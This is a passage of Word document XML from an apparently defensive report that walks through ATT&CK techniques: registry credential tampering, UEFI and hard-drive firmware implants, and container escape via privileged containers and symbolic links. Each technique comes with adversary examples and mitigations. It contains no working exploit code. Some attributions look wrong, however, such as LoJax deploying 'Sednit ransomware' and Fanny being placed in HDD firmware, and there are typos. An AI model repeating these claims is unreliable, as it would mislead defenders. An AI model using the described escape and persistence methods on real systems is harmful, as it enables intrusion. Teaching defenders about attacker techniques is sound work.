      </w:r>
    </w:p>
    <w:p w:rsidR="00D62A00" w:rsidRPr="00D62A00" w:rsidRDefault="00D62A00" w:rsidP="00303C97">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D62A00">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Adversary Example: APT32 used the GOODLUCK malware to modify registry values storing RDP credentials, enabling lateral movement via Pass-the-Hash attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D62A00" w:rsidRPr="00D62A00" w:rsidRDefault="00D62A00" w:rsidP="00303C97">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D62A00">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Impact: Survives credential resets if registry backups retain compromised entries.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D62A00" w:rsidRPr="00D62A00" w:rsidRDefault="00D62A00" w:rsidP="00151F35">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D62A00">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mitigations &amp; Detection:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D62A00" w:rsidRPr="00D62A00" w:rsidRDefault="00D62A00" w:rsidP="00303C97">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D62A00">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Registry Auditing: Enable RegNotifyChangeKey monitoring for sensitive keys.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D62A00" w:rsidRPr="00D62A00" w:rsidRDefault="00D62A00" w:rsidP="00303C97">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D62A00">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Least-Privilege Enforcement: Restrict non-admin users from modifying HKLM hive.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D62A00" w:rsidRPr="00D62A00" w:rsidRDefault="00D62A00" w:rsidP="00D62A00">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D62A00" w:rsidRPr="00303C97" w:rsidRDefault="00D62A00" w:rsidP="00D62A00">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00303C97">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>3) Technique: Pre-OS Boot → System Firmware (T1542.001)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D62A00" w:rsidRPr="00D62A00" w:rsidRDefault="00D62A00" w:rsidP="00D62A00">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00303C97">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Definition:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D62A00">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Adversaries embed malicious code in system firmware (e.g., UEFI/BIOS) to gain control before the OS loads. This sub-technique enables persistence that survives disk formatting, OS reinstallation, or security software removal.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00303C97" w:rsidRDefault="00303C97" w:rsidP="00D62A00">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00303C97" w:rsidRDefault="00303C97" w:rsidP="00D62A00">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00303C97" w:rsidRDefault="00303C97" w:rsidP="00D62A00">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00303C97" w:rsidRDefault="00303C97" w:rsidP="00D62A00">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00303C97" w:rsidRDefault="00303C97" w:rsidP="00D62A00">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D62A00" w:rsidRPr="00303C97" w:rsidRDefault="00303C97" w:rsidP="00D62A00">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Key Procedures</w:t>
      </w:r>
      <w:r w:rsidR="00D62A00" w:rsidRPr="00303C97">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D62A00" w:rsidRPr="00303C97" w:rsidRDefault="00D62A00" w:rsidP="00303C97">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00303C97">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>UEFI Rootkit Implantation via SPI Flash Memory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D62A00" w:rsidRPr="00D62A00" w:rsidRDefault="00D62A00" w:rsidP="00303C97">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D62A00">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mechanism: Adversaries exploit firmware update utilities to overwrite UEFI firmware stored on Serial Peripheral Interface (SPI) flash chips. Malicious code executes during boot, injecting malware into the OS kernel.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D62A00" w:rsidRPr="00D62A00" w:rsidRDefault="00D62A00" w:rsidP="00303C97">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D62A00">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Adversary Example: LoJax (linked to APT28) flashed malicious UEFI firmware to deploy Sednit ransomware, maintaining access for 18+ months despite disk replacements.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D62A00" w:rsidRPr="00D62A00" w:rsidRDefault="00D62A00" w:rsidP="00303C97">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D62A00">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Impact: Evades disk encryption (e.g., BitLocker) since malware loads pre-OS.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D62A00" w:rsidRPr="00303C97" w:rsidRDefault="00D62A00" w:rsidP="00303C97">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00303C97">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Hard Drive Firmware Modification for Stealthy Payload Delivery</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D62A00" w:rsidRPr="00D62A00" w:rsidRDefault="00D62A00" w:rsidP="00303C97">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D62A00">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mechanism: Malware reprograms hard drive controllers (e.g., via vendor-specific commands) to embed payloads in reserved firmware areas. Payloads activate during boot, reinstalling malware post-OS load.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D62A00" w:rsidRPr="00D62A00" w:rsidRDefault="00D62A00" w:rsidP="00303C97">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D62A00">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Adversary Example: Equation Group implanted Fanny malware in HDD firmware to steal data air-gapped networks. The malware used self-deletion routines to avoid forensic capture.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D62A00" w:rsidRPr="00D62A00" w:rsidRDefault="00D62A00" w:rsidP="00303C97">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D62A00">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Impact: Bypasts network segmentation by reinfecting connected systems during boot.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D62A00" w:rsidRPr="00303C97" w:rsidRDefault="00D62A00" w:rsidP="00303C97">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00303C97">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mitigations &amp; Detection:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D62A00" w:rsidRPr="00D62A00" w:rsidRDefault="00D62A00" w:rsidP="00303C97">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D62A00">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Secure Boot &amp; TPM Validation: Enforce UEFI Secure Boot and Trusted Platform Module (TPM) checks to block unsigned firmware.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D62A00" w:rsidRPr="00B52D87" w:rsidRDefault="00D62A00" w:rsidP="00303C97">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D62A00">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Firmware Integrity Scans: Use tools like CHIPSEC to compare firmware hashes against known-good baselines.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B52D87" w:rsidRDefault="00B52D87" w:rsidP="00B52D87">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B52D87" w:rsidRDefault="00B52D87" w:rsidP="00B52D87">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B52D87" w:rsidRPr="00264887" w:rsidRDefault="00B52D87" w:rsidP="00B52D87">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00264887" w:rsidRPr="00701072" w:rsidRDefault="00264887" w:rsidP="00701072">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Privilege Escalation</w:t>
      </w:r>
      <w:r w:rsidR="00303C97">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00701072" w:rsidRPr="00701072">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Tactic (TA0004)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00701072" w:rsidRDefault="00701072" w:rsidP="00701072">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00701072">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Definition:</w:t>
      </w:r>
      <w:r w:rsidRPr="00701072">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Privilege Escalation involves techniques adversaries use to elevate permissions on compromised systems (e.g., from user to admin or SYSTEM/root). This enables broader control for objectives like data theft, defense evasion, or lateral movement. Techniques often exploit system misconfigurations, vulnerabilities, or legitimate mechanisms like task schedulers or container escapes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00701072" w:rsidRDefault="00701072" w:rsidP="00701072">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00950FDC" w:rsidRPr="00950FDC" w:rsidRDefault="00950FDC" w:rsidP="00950FDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00950FDC">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1) Technique: Escape to Host (T1611)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00886717" w:rsidRDefault="00950FDC" w:rsidP="00886717">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00950FDC">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Definition:</w:t>
      </w:r>
      <w:r w:rsidRPr="00950FDC">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Adversaries break out of containerized (e.g., Docker) or virtualized (e.g., VMware ESXi) environments to access the underlying host. This grants control over all hosted resources and</w:t>
      </w:r>
      <w:r w:rsidR="007A111E">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> bypasses isolation safeguards.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00886717" w:rsidRDefault="00886717" w:rsidP="00886717">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00950FDC" w:rsidRPr="00886717" w:rsidRDefault="007A111E" w:rsidP="00886717">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00886717">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Key Procedures</w:t>
      </w:r>
      <w:r w:rsidR="00950FDC" w:rsidRPr="00886717">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00950FDC" w:rsidRPr="007A111E" w:rsidRDefault="00950FDC" w:rsidP="007A111E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A111E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Bind-Mounting Host Filesystem via Privileged Containers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00950FDC" w:rsidRPr="00950FDC" w:rsidRDefault="00950FDC" w:rsidP="007A111E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A111E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mechanism:</w:t>
      </w:r>
      <w:r w:rsidRPr="00950FDC">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Adversaries deploy containers with elevated privileges (--privileged flag in Docker) and mount the host’s root directory (/) to the container. This allows direct modification of host files (e.g., cron jobs, SSH keys).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00950FDC" w:rsidRPr="00950FDC" w:rsidRDefault="00950FDC" w:rsidP="007A111E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00950FDC">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Adversary Example: TeamTNT deployed privileged containers mounting / to plant cryptocurrency miners on the host. They then modified crontab to sustain execution after reboot.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00950FDC" w:rsidRPr="00950FDC" w:rsidRDefault="00950FDC" w:rsidP="007A111E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00950FDC">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Impact: Full host compromise; evasion of container security tools (e.g., Falco).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00950FDC" w:rsidRPr="007A111E" w:rsidRDefault="00950FDC" w:rsidP="007A111E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A111E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Exploiting Global Symbolic Links for Hypervisor Access</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00950FDC" w:rsidRPr="00950FDC" w:rsidRDefault="00950FDC" w:rsidP="007A111E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00950FDC">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mechanism: Abuse OS vulnerabilities (e.g., Windows NtSetInformationSymbolicLink API) to create global symbolic links pointing to host directories. This escapes container boundaries to execute host-level payloads.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00950FDC" w:rsidRPr="00950FDC" w:rsidRDefault="00950FDC" w:rsidP="007A111E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00950FDC">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Adversary Example: Siloscape malware mapped the host’s C:\ drive to a container path, enabling theft of Kubernetes credentials stored on the host.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00950FDC" w:rsidRPr="00950FDC" w:rsidRDefault="00950FDC" w:rsidP="007A111E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00950FDC">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Impact: Access to cloud orchestration secrets (e.g., AWS IAM roles, kubeconfig files).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00950FDC" w:rsidRPr="007A111E" w:rsidRDefault="00950FDC" w:rsidP="007A111E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A111E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mitigations:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00950FDC" w:rsidRPr="00950FDC" w:rsidRDefault="00950FDC" w:rsidP="007A111E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00950FDC">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Restrict container privileges (e.g., Kubernetes PodSecurityPolicy blocking hostPath mounts).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00950FDC" w:rsidRPr="00950FDC" w:rsidRDefault="00950FDC" w:rsidP="007A111E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00950FDC">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Enforce read-only filesystems and seccomp profiles to block dangerous syscalls (e.g., mount()).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00950FDC" w:rsidRPr="00950FDC" w:rsidRDefault="00950FDC" w:rsidP="00950FDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00950FDC" w:rsidRPr="00950FDC" w:rsidRDefault="00950FDC" w:rsidP="00950FDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00950FDC">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>2) Technique: Exploitation for Privilege Escalation (T1068)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00950FDC" w:rsidRPr="00950FDC" w:rsidRDefault="00950FDC" w:rsidP="00950FDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A111E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Definition:</w:t>
      </w:r>
